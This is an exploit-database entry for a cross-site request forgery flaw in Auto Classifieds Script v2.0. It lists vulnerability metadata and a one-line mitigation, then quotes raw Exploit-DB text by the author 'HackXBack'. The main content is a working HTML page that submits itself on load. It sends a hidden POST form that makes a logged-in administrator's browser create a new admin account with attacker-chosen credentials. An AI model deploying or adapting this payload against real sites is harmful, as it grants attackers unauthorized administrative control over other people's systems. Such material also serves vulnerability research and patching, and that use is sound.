Auto Classifieds Script v2.0 - CSRF Vulnerabilty [Add Admin]

vendor:

Auto Classifieds Script

by:

HackXBack

8,8

CVSS

HIGH

Cross Site Request Forgery

352

CWE

Product Name: Auto Classifieds Script

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpjabbers:auto_classifieds_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Auto Classifieds Script v2.0 – CSRF Vulnerabilty [Add Admin]

This exploit allows an attacker to add an admin user to the Auto Classifieds Script v2.0 by sending a malicious POST request. The request contains the full name, username, password, status and role_id of the admin user to be added.

Mitigation:

Implementing a CSRF token in the POST request can prevent this attack.

Source

Exploit-DB raw data:

Auto Classifieds Script v2.0 - CSRF Vulnerabilty [Add Admin]
====================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         :
http://www.phpjabbers.com/preview/auto-classifieds-script/

####################################################################

===[ Exploit ]===

Cross Site Request Forgery
===========================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://www.site.com/index.php?controller=AdminUsers&action=create">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="Full_name" value="Iphobos"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="status" value="T"/>
<input type="hidden" name="role_id" value="1"/>
</form>

</body>
</html>


####################################################################